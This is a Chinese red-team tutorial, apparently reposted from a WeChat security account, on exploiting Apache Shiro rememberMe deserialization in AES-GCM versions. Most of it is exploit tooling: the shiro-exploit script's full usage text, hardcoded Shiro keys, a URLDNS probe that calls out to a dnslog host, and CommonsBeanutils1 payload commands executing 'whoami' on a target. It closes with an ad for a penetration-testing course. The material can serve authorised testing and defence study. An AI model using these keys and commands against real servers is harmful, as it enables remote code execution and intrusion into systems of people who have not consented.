红队攻击第1篇 shiro AES_GCM 反序列化利用
2022-9-25 13:48:4 Author: moonsec(查看原文) 阅读量:28 收藏

红队攻击第1篇 shiro AES_GCM 反序列化利用

1简介

新版本Shiro(>=1.4.2)采用了AES-GCM加密方式,导致旧版工具的加密算法无法正常利用漏洞
如果知道硬编码的情况下可以使用工具
shiro_attack-4.5.3-SNAPSHOT-all 勾上 aes gsm 使用即可

2Ares-X使用

也可以使用脚本  https://github.com/Ares-X/shiro-exploit 进行利用

pip3 install pycryptodome

安装依赖包

python shiro-exploit.py -husage: shiro-exploit.py [-h] [--version VERSION] [--key KEY] [--url URL] [--gadget GADGET] [--command COMMAND]                        [--ser SER]                        mode
Shiro-Exploit : Use python3 shiro-exploit.py usage for More Help Infomation
positional arguments: mode check/yso/echo/encdoe
optional arguments: -h, --help show this help message and exit --version VERSION, -v VERSION Choice Shiro Encrypt Version,1 For AES-CBC 2 For AES-GCM --key KEY, -k KEY Specific shiro key or user default --url URL, -u URL Specific URL Address --gadget GADGET, -g GADGET Specific Gadget [CommonsCollectionsK1/CommonsCollectionsK2/CommonsBeanutils1/CommonsBeanutils2 /Jdk7u21/Jdk8u20] --command COMMAND, -c COMMAND Specific Execute Command --ser SER, -s SER Specific serialize File Path
Usage:    python3 shiro-exploit.py mode arguments    You Can Change Default Key and Ysoserial Path at The Top of File    For Most Usage: [-u url]    Will Send Payload To Target URL                                Left it Empty to Genereate Payload and Exploit Manual                    [-k key]    Will Encrypt Payload With Specific Key                                Left it Empty to Use Shiro Default Key kPH+bIxk5D2deZiIxcaaaA==                    [-v version]Will Encrypt Payload to Specific Shiro Encrypt Version                                if Shiro Version Used AES-CBC Set -v to 1 , if Shiro Used AES-GCM Set -v to 2 , or Left it Empty to Use Default 1                    Those arguments is Not Necessary , Change it If You Need    Sample:    python3 shiro-exploit.py check -u http://127.0.0.1  Auto Detect Shiro Key For Version 1 And Version 2    python3 shiro-exploit.py check -u http://127.0.0.1 -v 1 Auto Detect Shiro Key For Version 1    python3 shiro-exploit.py check -k zSyK5Kp6PZAAjlT+eeNMlg== Genereate Check Specific Key Payload For Version 1 and 2    python3 shiro-exploit.py check -k zSyK5Kp6PZAAjlT+eeNMlg== -v 2 Genereate Check Specific Key Payload For Version 2    python3 shiro-exploit.py yso -g URLDNS -c "http://xxx.dnslog.pro" -u http://127.0.0.1 -k zSyK5Kp6PZAAjlT+eeNMlg== -v 1 Send Ysoserial Payload to Target URL    python3 shiro-exploit.py yso -g URLDNS -c "http://xxx.dnslog.pro" -k zSyK5Kp6PZAAjlT+eeNMlg== -v 1 Genereate Ysoserial Payload    python3 shiro-exploit.py echo -g CommonsCollectionsK1 -c "ifconfig" -u http://127.0.0.1 Send Tomcat Echo Payload To Target URL    python3 shiro-exploit.py echo -g CommonsCollectionsK1 -c "ifconfig" -k zSyK5Kp6PZAAjlT+eeNMlg== Genereate Tomcat Echo Payload    python3 shiro-exploit.py encode -s ./cookie.ser -u http://127.0.0.1 Encode Serialize File And Send to Target URL    python3 shiro-exploit.py encode -s ./cookie.ser -k zSyK5Kp6PZAAjlT+eeNMlg== Encode Serialize File For Exploit Manual

脚本自带一些硬编码,这里是知道硬编码的。所以把编码加进行就可以了。
检测硬编码
2是 gsm加密方式

python shiro-exploit.py check -u http://192.168.0.115:8080 -v 2

知道硬编码的前提下可以使用key进行检测
利用dnslog检测目标是否存在漏洞

shiro-exploit.py yso -g URLDNS -c "http://moonsec.03d3fu.dnslog.cn" -k d3d3bWluZ3NvZnRuZXRtcw== -u http://192.168.0.115:8080/xxx/ms/login.do -v 2Gadget: URLDNS Command: http://moonsec.03d3fu.dnslog.cnSend Over:200

命令执行 shiro一般使用  CommonsBeanutils1 这无依赖链子

shiro-exploit.py echo -g CommonsBeanutils1 -u http://192.168.0.115:8080/xxx/ms/index.do -v 2 -k d3d3bWluZ3NvZnRuZXRtcw== -c whoami

3关注公众号

公众号长期更新安全类文章,关注公众号,以便下次轻松查阅

觉得文章对你有帮助 请转发 点赞 收藏

6关注培训

需要渗透测试培训可联系暗月

课程详细介绍点击即可了解

暗月渗透测试课程更新


文章来源: http://mp.weixin.qq.com/s?__biz=MzAwMjc0NTEzMw==&mid=2653583130&idx=1&sn=b15069a34ebc4113d2f5967914fa9ebe&chksm=811b6158b66ce84e665f23ac5e7919e0393bbe1dc67eafc93e27604ff36f7fd0012c35fc3af1#rd
如有侵权请联系:admin#unsafe.sh